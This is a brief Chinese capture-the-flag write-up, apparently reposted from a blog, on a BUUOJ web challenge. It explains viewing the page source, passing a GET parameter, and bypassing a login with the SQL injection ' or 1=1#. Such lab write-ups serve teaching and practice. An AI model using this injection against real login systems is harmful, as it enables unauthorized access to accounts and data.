标签:height net xls 情况 dog 极客 image 源码 blank
复现环境:buuoj
F12查看源码,明显html注释里是一段php
get方式传参数,payload:http://f5cdd431-df98-487f-9400-e8d044fcc945.node3.buuoj.cn/?cat=dog
用万能密码
用户名:‘or 1=1#
密码 : 随便输
看下用户名和密码都不知道的情况:
username='admin'or 1=1#' and password='随便写'
#把后面的都注释掉了,1=1为真,最后还为真
标签:height net xls 情况 dog 极客 image 源码 blank
原文地址:https://www.cnblogs.com/wrnan/p/12343287.html